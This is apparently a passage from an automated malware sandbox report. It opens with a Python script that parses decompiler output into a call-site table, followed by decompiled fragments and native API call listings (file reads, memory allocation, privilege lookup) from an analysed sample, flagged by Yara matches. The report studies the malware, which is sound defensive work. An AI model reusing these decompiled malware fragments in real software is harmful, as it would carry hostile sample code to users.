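The executed-function listings above are decompiler output, and two pairs of them (E004184B2 with E004184C0, E00418611 with E00418620) decompile the same bytes from different entry offsets, which is why each pair reports the same `ref:` address for its API call. The script below is an added example, not part of this report or of the sample: it parses blocks in the layout used on this page into call sites and collapses overlapping decompilations by call-instruction address, keeping the entry with the higher decompiler quality. The `SAMPLE` text is constructed from the blocks above with the argument lists shortened; the `CallSite` type and function names are this example's own.

```python
"""Turn sandbox decompiler blocks into a de-duplicated API call-site table.

Each block begins with 'C-Code - Quality: NN%', names the routine
(e.g. E004184C0(...)), and is followed by an 'APIs' list with lines such as
'• RtlFreeHeap.NTDLL(00000060,...), ref: 004184ED'.
"""
import re
from dataclasses import dataclass

# Constructed sample in the layout of the report blocks above
# (argument lists shortened; names, refs and qualities as listed).
SAMPLE = """
C-Code - Quality: 43%
    E004184B2(void* __eax, void* __edi, intOrPtr _a9) {
        _t12 = RtlFreeHeap(_a13, _a17, _a21); // executed
    }

APIs
• RtlFreeHeap.NTDLL(00000060,00408AE3,?,?), ref: 004184ED
Memory Dump Source
• Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

C-Code - Quality: 100%
    E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
        _t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
    }

APIs
• RtlFreeHeap.NTDLL(00000060,00408AE3,?,?), ref: 004184ED
Memory Dump Source
• Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

C-Code - Quality: 100%
    E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
        _t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
    }

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92), ref: 00418650
Memory Dump Source
• Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

C-Code - Quality: 100%
    E00418500(intOrPtr _a4, int _a8) {
        ExitProcess(_a8);
    }

APIs
• ExitProcess.KERNEL32(?,?,00000000), ref: 00418528
"""

# One API line: bullet, Api.MODULE(args), ref: 8 hex digits.
API_RE = re.compile(r"•\s*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]{8})")
# Start of a block: quality percentage, then the routine name on the next line.
HEAD_RE = re.compile(r"(\d+)%\s+(E[0-9A-F]{8})\(")


@dataclass(frozen=True)
class CallSite:
    function: str   # decompiler's name for the containing routine
    quality: int    # decompiler confidence in percent
    api: str        # imported/resolved API name
    module: str     # module the sandbox attributed the API to
    ref: int        # address of the call instruction


def parse_call_sites(text: str) -> list[CallSite]:
    """Extract every (routine, API, ref) triple from a listing."""
    sites: list[CallSite] = []
    # The chunk before the first 'C-Code - Quality:' header holds no block.
    for chunk in re.split(r"(?m)^\s*C-Code - Quality: ", text)[1:]:
        head = HEAD_RE.match(chunk)
        if head is None:
            continue
        quality, func = int(head.group(1)), head.group(2)
        for api, module, _args, ref in API_RE.findall(chunk):
            sites.append(CallSite(func, quality, api, module, int(ref, 16)))
    return sites


def distinct_call_sites(sites: list[CallSite]) -> list[CallSite]:
    """Keep one entry per call address, preferring the higher-quality listing.

    Misaligned decompilations (E004184B2 vs E004184C0) decode the same bytes
    and therefore carry the same ref; counting both would double a call site.
    """
    best: dict[int, CallSite] = {}
    for s in sites:
        cur = best.get(s.ref)
        if cur is None or s.quality > cur.quality:
            best[s.ref] = s
    return sorted(best.values(), key=lambda s: s.ref)


def api_summary(sites: list[CallSite]) -> dict[str, list[str]]:
    """Map 'MODULE!Api' to the call-instruction addresses that reach it."""
    out: dict[str, list[str]] = {}
    for s in distinct_call_sites(sites):
        out.setdefault(f"{s.module}!{s.api}", []).append(f"{s.ref:08X}")
    return out


if __name__ == "__main__":
    for name, refs in api_summary(parse_call_sites(SAMPLE)).items():
        print(name, ", ".join(refs))
```

Feeding the full report through `parse_call_sites` gives a call-site table keyed by address rather than by routine name, which is the form that survives the decompiler's overlapping entries and can be matched against a debugger breakpoint list or an unpacked-dump disassembly.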

                                                                              Non-executed Functions

                                                                              C-Code - Quality: 47%
                                                                              			E0041563B(void* __eax, intOrPtr __ebx, void* __ecx, intOrPtr* __edx, intOrPtr _a17, intOrPtr _a21, intOrPtr _a25) {
                                                                              				signed int _t19;
                                                                              				void* _t25;
                                                                              				signed int _t26;
                                                                              				signed int _t29;
                                                                              				void* _t31;
                                                                              				void* _t36;
                                                                              				void* _t40;
                                                                              				char _t44;
                                                                              				void* _t54;
                                                                              				void* _t64;
                                                                              				intOrPtr _t65;
                                                                              
                                                                              				_t39 = __ecx;
                                                                              				_t33 = __ebx;
                                                                              				_t53 = 0x15b678a5;
                                                                              				asm("insd");
                                                                              				_t19 = __eax + 1;
                                                                              				 *__edx =  *__edx - __ebx;
                                                                              				_t48 = 0xbf72d3c0;
                                                                              				asm("out 0x60, al");
                                                                              				_push(_t64);
                                                                              				asm("adc eax, 0xf78ac656");
                                                                              				_t65 = _t64 - 1;
                                                                              				_pop(es);
                                                                              				asm("lodsb");
                                                                              				if( *__edx == 0) {
                                                                              					L6:
                                                                              					_t54 = _t53 - 1;
                                                                              					 *_t19 =  *_t19 + _t19;
                                                                              					if(_t19 != 0) {
                                                                              						goto L4;
                                                                              					} else {
                                                                              						_t14 = _t48 + 0x3e6b; // 0xbf73122b
                                                                              						if(E0041A4F0(_t39, _t33, _t14, _t54) != 0) {
                                                                              							goto L4;
                                                                              						} else {
                                                                              							_t15 = _t48 + 0x3e72; // 0xbf731232
                                                                              							if(E0041A4F0(_t39, _t33, _t15, _t54) != 0) {
                                                                              								goto L4;
                                                                              							} else {
                                                                              								_push(_t54);
                                                                              								_t16 = _t48 + 0x3e79; // 0xbf731239
                                                                              								_t40 = _t16;
                                                                              								_push(_t40);
                                                                              								_push(_t33);
                                                                              								if(E0041A4F0(_t40) != 0) {
                                                                              									goto L4;
                                                                              								} else {
                                                                              									_t17 = _t48 + 0x3e81; // 0xbf731241
                                                                              									_t25 = E0041A4F0(_t40, _t33, _t17, _t54);
                                                                              									if(_t25 != 0) {
                                                                              										goto L4;
                                                                              									} else {
                                                                              										_t26 = E0041A4F0(_t40, _t33, _t48 + 0x3e8a, _t54);
                                                                              										asm("sbb eax, eax");
                                                                              										return  ~( ~_t26);
                                                                              									}
                                                                              								}
                                                                              							}
                                                                              						}
                                                                              					}
                                                                              				} else {
                                                                              					asm("adc [edi], dl");
                                                                              					_t36 = __ebx - _t19;
                                                                              					asm("cdq");
                                                                              					asm("wait");
                                                                              					 *((intOrPtr*)(__edx + 0x54ce0d4e)) = _t65;
                                                                              					_pop(_t44);
                                                                              					_t29 = _t19;
                                                                              					_pop(es);
                                                                              					_t2 = __ecx - 0x2e;
                                                                              					 *_t2 =  *(__ecx - 0x2e) | 0x00001d84;
                                                                              					asm("adc al, 0xb4");
                                                                              					asm("out 0x19, al");
                                                                              					 *0x6DBE9D47 = _t44;
                                                                              					if( *_t2 >= 0) {
                                                                              						_push(_t36);
                                                                              						_t33 = _a21;
                                                                              						_push(0x15b678a5);
                                                                              						_push(0xbf72d3c0);
                                                                              						_t48 = _a17;
                                                                              						_t53 = _a25 + 0xfffffffe;
                                                                              						_t31 = E0041A4F0(__ecx, _t33, _t48 + 0x3e5e, _t53);
                                                                              						_t65 = _t65 + 0xc;
                                                                              						if(_t31 == 0) {
                                                                              							_t39 = _t48 + 0x3e64;
                                                                              							_t19 = E0041A4F0(_t48 + 0x3e64, _t33, _t48 + 0x3e64, _t53);
                                                                              							goto L6;
                                                                              						} else {
                                                                              							L4:
                                                                              							return 1;
                                                                              						}
                                                                              					} else {
                                                                              						asm("lock pop ebp");
                                                                              						asm("outsb");
                                                                              						return _t29 *  *5;
                                                                              					}
                                                                              				}
                                                                              			}

                                                                              [Instruction address column for the decompiled function above, addresses 0x0041563b through 0x00415745; the per-line addresses were separated from the code lines by extraction and are not reproduced here.]

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1b2669a5a9dfb542dca5d42c2ea4b15cb8aed8df01584b0957a6ff88d4fdd388
                                                                              • Instruction ID: e918600535758e5ce0fbe2fca3a91d9c0eb22ab92b0a03aa3c091e480a0438dc
                                                                              • Opcode Fuzzy Hash: 1b2669a5a9dfb542dca5d42c2ea4b15cb8aed8df01584b0957a6ff88d4fdd388
                                                                              • Instruction Fuzzy Hash: 4A212B73A026556AD6004635FC419F7B35CDFE122CB481257FC0DC2243F66AE6A486ED
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ec7946d5f6691051f80e2ff6cd3d2a7c4b46d5d4b4849b2f51272910bd69bda0
                                                                              • Instruction ID: 372b912e5a3c30a65e92bb537b5dde9eea3d34e89ef6cd715555c0b15d8a138e
                                                                              • Opcode Fuzzy Hash: ec7946d5f6691051f80e2ff6cd3d2a7c4b46d5d4b4849b2f51272910bd69bda0
                                                                              • Instruction Fuzzy Hash: 7EC09B33E7500946E520DC2DB4816F4F3E4D767178F103357E804E3544D557D451054D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 996540c79dd47a1884f500e307987ce09dbc2a04afe2c35bb931407cd7c8723f
                                                                              • Instruction ID: 46278940e38c78cc032eded5860e3122ad04eb904f6cfedb6947099d73470fa8
                                                                              • Opcode Fuzzy Hash: 996540c79dd47a1884f500e307987ce09dbc2a04afe2c35bb931407cd7c8723f
                                                                              • Instruction Fuzzy Hash: 0690026130100403D213616944146060009E7D1386F91C022E5414555D86758997F172
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fbb17eaf313eb2b73101d6ba1105f01c8d82937820c3702461aa83fe002d9eb6
                                                                              • Instruction ID: ceb868cc9e9df72b09cb739356477f8b24d0a15ff353318d04c7ca4381bcd75d
                                                                              • Opcode Fuzzy Hash: fbb17eaf313eb2b73101d6ba1105f01c8d82937820c3702461aa83fe002d9eb6
                                                                              • Instruction Fuzzy Hash: 1690027124100403D252716944046060009F7D0382F91C022A4414554E86A58A9AFAA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2b5f1a4bdc502f07fb262b51d0b98e1a7b28bc2adb540233d5cb6daa67bf9233
                                                                              • Instruction ID: ebd74727f9968b65acdb243d83b3c118fa4e5621fef973a144f97fa76ef665c3
                                                                              • Opcode Fuzzy Hash: 2b5f1a4bdc502f07fb262b51d0b98e1a7b28bc2adb540233d5cb6daa67bf9233
                                                                              • Instruction Fuzzy Hash: 709002A1601140434651B16948044065015F7E1342391C131A4444560C86B88899E2A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 20840e138c7fafce1bab3f81ce9e169c881055d8408c36295180227099d2276b
                                                                              • Instruction ID: c951432fe5c4058c153db097a039c966a56ed862fb3ac2b22d6b3806fec45679
                                                                              • Opcode Fuzzy Hash: 20840e138c7fafce1bab3f81ce9e169c881055d8408c36295180227099d2276b
                                                                              • Instruction Fuzzy Hash: 069002A121100043D215616944047060045E7E1342F51C022A6144554CC5798CA5A165
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cf059bafb56d0324806d2a47806a0aa01a0a0b7e611f70b1dc0cd1e04acca876
                                                                              • Instruction ID: d2085487a3ec68fd569bb16c1c296a41458a7b96445308001ec600eac6f1d6fb
                                                                              • Opcode Fuzzy Hash: cf059bafb56d0324806d2a47806a0aa01a0a0b7e611f70b1dc0cd1e04acca876
                                                                              • Instruction Fuzzy Hash: 5D9002A120140403D251656948046070005E7D0343F51C021A6054555E8A798C95B175
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c5cfecead7238c6bcb2febcf4acf2c762445969075f04d5ca4660cd06bbf5d60
                                                                              • Instruction ID: fb4873722bc49e1438366c2fb09a5e83f317e2261090460bcff93e7900d04fa4
                                                                              • Opcode Fuzzy Hash: c5cfecead7238c6bcb2febcf4acf2c762445969075f04d5ca4660cd06bbf5d60
                                                                              • Instruction Fuzzy Hash: F890026120144443D25162694804B0F4105E7E1343F91C029A8146554CC9658899A761
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7b4e0120119ced6e23e3d0bc5b3e0898fbca38d2d3c696c5353e43c658fc4a7f
                                                                              • Instruction ID: 78729c7e456cedafee4e02f6214a96a7b87f8a13df7603f43e31fac003ec9e52
                                                                              • Opcode Fuzzy Hash: 7b4e0120119ced6e23e3d0bc5b3e0898fbca38d2d3c696c5353e43c658fc4a7f
                                                                              • Instruction Fuzzy Hash: 1C90027120140403D211616948087470005E7D0343F51C021A9154555E86B5C8D5B571
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 47dd9c4804e01f6535cf8dcd5c82f6fa51b31d33648736742d1feb5a2d37a24d
                                                                              • Instruction ID: 95c9fdbf52c786c238a7e98c2b2474a4f2ecf9d10e13456b8023b5e74b8376e0
                                                                              • Opcode Fuzzy Hash: 47dd9c4804e01f6535cf8dcd5c82f6fa51b31d33648736742d1feb5a2d37a24d
                                                                              • Instruction Fuzzy Hash: AF90027120144003D2517169844460B5005F7E0342F51C421E4415554C8665889AE261
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 63a49d2f34be801f8be5a4c13cc023efd8972f5e5a181b6e4bbd6518b6eec37b
                                                                              • Instruction ID: 7e059550ac9cd0fe813c07f0b143804b59d5fcd75d57b298bf6bf8d73168e75d
                                                                              • Opcode Fuzzy Hash: 63a49d2f34be801f8be5a4c13cc023efd8972f5e5a181b6e4bbd6518b6eec37b
                                                                              • Instruction Fuzzy Hash: A990026124100803D251716984147070006E7D0742F51C021A4014554D866689A9B6F1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e29aa6309b2046c451b9fa21c54aebabf61f437237750c172440827b66a86ca4
                                                                              • Instruction ID: 0ec7667788d7ba64c09a9b01173b1ecc9dc5ca75eb6eaf9018ff1c73f168dbfa
                                                                              • Opcode Fuzzy Hash: e29aa6309b2046c451b9fa21c54aebabf61f437237750c172440827b66a86ca4
                                                                              • Instruction Fuzzy Hash: 7290027120100803D215616948046860005E7D0342F51C021AA014655E96B588D5B171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 53%
                                                                              			// Sandbox decompiler output for the function at 0x00A9FDDA in the module mapped at 0x009E0000.
                                                                              			// The "RTL: ... CriticalSection" format strings are ntdll's critical-section contention diagnostics;
                                                                              			// E00A4CE00 and E00A95720 are the decompiler's names for callees at those addresses (bodies not shown).
                                                                              			// __edx: pointer to the 64-bit timeout (lo at +0, hi at +4); _t12 (this pointer): the RTL_CRITICAL_SECTION.
                                                                              			E00A9FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                              				void* _t7;
                                                                              				intOrPtr _t9;
                                                                              				intOrPtr _t10;
                                                                              				intOrPtr* _t12;
                                                                              				intOrPtr* _t13;
                                                                              				intOrPtr _t14;
                                                                              				intOrPtr* _t15;
                                                                              
                                                                              				_t13 = __edx;
                                                                              				_push(_a4);
                                                                              				_t14 =  *[fs:0x18];   // x86 TEB self-pointer (NtTib.Self)
                                                                              				_t15 = _t12;          // the critical section being diagnosed
                                                                              				// 0xff676980:0xffffffff is the 64-bit constant -10,000,000, i.e. one second in 100 ns units;
                                                                              				// E00A4CE00 presumably converts the stored timeout to seconds for the %I64u format below.
                                                                              				_t7 = E00A4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                              				_push(_t13);
                                                                              				E00A95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                              				_t9 =  *_t15;         // RTL_CRITICAL_SECTION.DebugInfo
                                                                              				if(_t9 == 0xffffffff) {
                                                                              					_t10 = 0;         // DebugInfo == -1 means no debug record, so no ContentionCount
                                                                              				} else {
                                                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));   // RTL_CRITICAL_SECTION_DEBUG.ContentionCount
                                                                              				}
                                                                              				// Arguments pushed right to left: ContentionCount, critical section, owner tid,
                                                                              				// TEB+0x24 (ClientId.UniqueThread); TEB+0x20 (ClientId.UniqueProcess) is passed explicitly.
                                                                              				_push(_t10);
                                                                              				_push(_t15);
                                                                              				_push( *((intOrPtr*)(_t15 + 0xc)));    // RTL_CRITICAL_SECTION.OwningThread
                                                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                              				return E00A95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                              			}

                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A9FDFA
                                                                              Strings
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A9FE01
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A9FE2B
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                              • API String ID: 885266447-3903918235
                                                                              • Opcode ID: 56d8e72654405563a8ffb95d3bd84b11b48ee170e74613cfb83fd8ec3996c458
                                                                              • Instruction ID: f9777dde4f8a5118051e18914841f152b5170893f61db5a15f5c931e5081b0a8
                                                                              • Opcode Fuzzy Hash: 56d8e72654405563a8ffb95d3bd84b11b48ee170e74613cfb83fd8ec3996c458
                                                                              • Instruction Fuzzy Hash: 46F0C232640601BFDA211A95DD07F23BBAAEB84730F240214F628965E1DA62A92097A0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Executed Functions

                                                                              APIs
                                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,02BB3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02BB3B87,007A002E,00000000,00000060,00000000,00000000), ref: 02BB81FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID: .z`
                                                                              • API String ID: 823142352-1441809116
                                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                              • Instruction ID: c06f60a2517aa8146295ec81e3ad02c1bb7cb5490cc68845d2a7205feb607cb2
                                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                              • Instruction Fuzzy Hash: 42F0B2B2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtReadFile.NTDLL(02BB3D42,5E972F59,FFFFFFFF,02BB3A01,?,?,02BB3D42,?,02BB3A01,FFFFFFFF,5E972F59,02BB3D42,?,00000000), ref: 02BB82A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 31436921a12ce6f45ca95a70de23024821e09fbedbca5d09323ea843085d276f
                                                                              • Instruction ID: 8b9234b6a784245cdb38544e01c6791e07340cf293ce3cb0b3ce1062522487cd
                                                                              • Opcode Fuzzy Hash: 31436921a12ce6f45ca95a70de23024821e09fbedbca5d09323ea843085d276f
                                                                              • Instruction Fuzzy Hash: 46F0E7B6200508AFCB04DF98DC81EEB7BBAFF8C354F058659BA1DD7250D630E8118BA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtReadFile.NTDLL(02BB3D42,5E972F59,FFFFFFFF,02BB3A01,?,?,02BB3D42,?,02BB3A01,FFFFFFFF,5E972F59,02BB3D42,?,00000000), ref: 02BB82A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                              • Instruction ID: 1b35c7609b9b890c8bf257d3faae5cd06f2e3a60e24550aa7322d339b75b3b63
                                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                              • Instruction Fuzzy Hash: DFF0A4B2200208ABCB14DF89DC80EEB77ADAF8C754F158649BA1D97251DA30E8118BA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02BA2D11,00002000,00003000,00000004), ref: 02BB83C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                              • Instruction ID: ba1f37ad2f2f76a2a3d7d45d8adc30ec55cdd7cfb16af3db3970da371d471ccc
                                                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                              • Instruction Fuzzy Hash: E8F015B2200208ABCB14DF89CC80EEB77ADAF88750F118549BE0897241C630F810CBE0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02BA2D11,00002000,00003000,00000004), ref: 02BB83C9
Memory Dump Source
• Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: 8c49f9ac89e2aa145e7b772651f8314f8f795b0ad2784a25e62e65f418ff8087
• Instruction ID: 8e19089f2d9631dad9749267daada5271c874a92830e2d0d2d3c9756ac40da82
• Opcode Fuzzy Hash: 8c49f9ac89e2aa145e7b772651f8314f8f795b0ad2784a25e62e65f418ff8087
• Instruction Fuzzy Hash: 93F015B6201108AFDB18DF98CC80EEBB7ADEF88350F118589FE0897251C630E811CBA0
Uniqueness Score: -1.00%

APIs
• NtClose.NTDLL(02BB3D20,?,?,02BB3D20,00000000,FFFFFFFF), ref: 02BB8305
Memory Dump Source
• Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: e71122083a53032bc3b3b30bc980164b0163b23ca25727f5ba70e974d1f3141e
• Instruction ID: cc824a301630566b548c82c0475d17c6563807a2433e2241a00feda9757c0e73
• Opcode Fuzzy Hash: e71122083a53032bc3b3b30bc980164b0163b23ca25727f5ba70e974d1f3141e
• Instruction Fuzzy Hash: B4E08C722406146FE714DBA88C85FEB3B59EF48220F244699FA5C9B2D2C631E9428694
Uniqueness Score: -1.00%

APIs
• NtClose.NTDLL(02BB3D20,?,?,02BB3D20,00000000,FFFFFFFF), ref: 02BB8305
Memory Dump Source
• Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
• Instruction ID: d1f0e768f238b5af69a3ccedb6d64f122f8f78a453c66fa9498a79d65bfeef79
• Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
• Instruction Fuzzy Hash: 2ED012752002146BD710EF98CC85EE7775DEF44750F154499BA185B241C570F90086E0
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b2c6d41ab453cc0720d5291d6ed3c568b60b91770d18476f4c29d5baecffbec0
• Instruction ID: f0157193fb2b2ea4e19b2f286e80e42bf51faee1cc5bce62449808db9d1df19d
• Opcode Fuzzy Hash: b2c6d41ab453cc0720d5291d6ed3c568b60b91770d18476f4c29d5baecffbec0
• Instruction Fuzzy Hash: 189002A5211001032106A9590705507005AD7D5395751C021F5006555CE661D8A16161
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 663a480896ef4ccce9c4ab8c65a52b505ba4bdc71e18808259591233f9f0631b
• Instruction ID: 7119080ef5f525b380da2fb0d0a5af74cea54ddf6b59e8f3ef6ac05087889e8f
• Opcode Fuzzy Hash: 663a480896ef4ccce9c4ab8c65a52b505ba4bdc71e18808259591233f9f0631b
• Instruction Fuzzy Hash: 299002E120200103610675594415616401ED7E0245F51C021E5005595DD565D8D17165
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
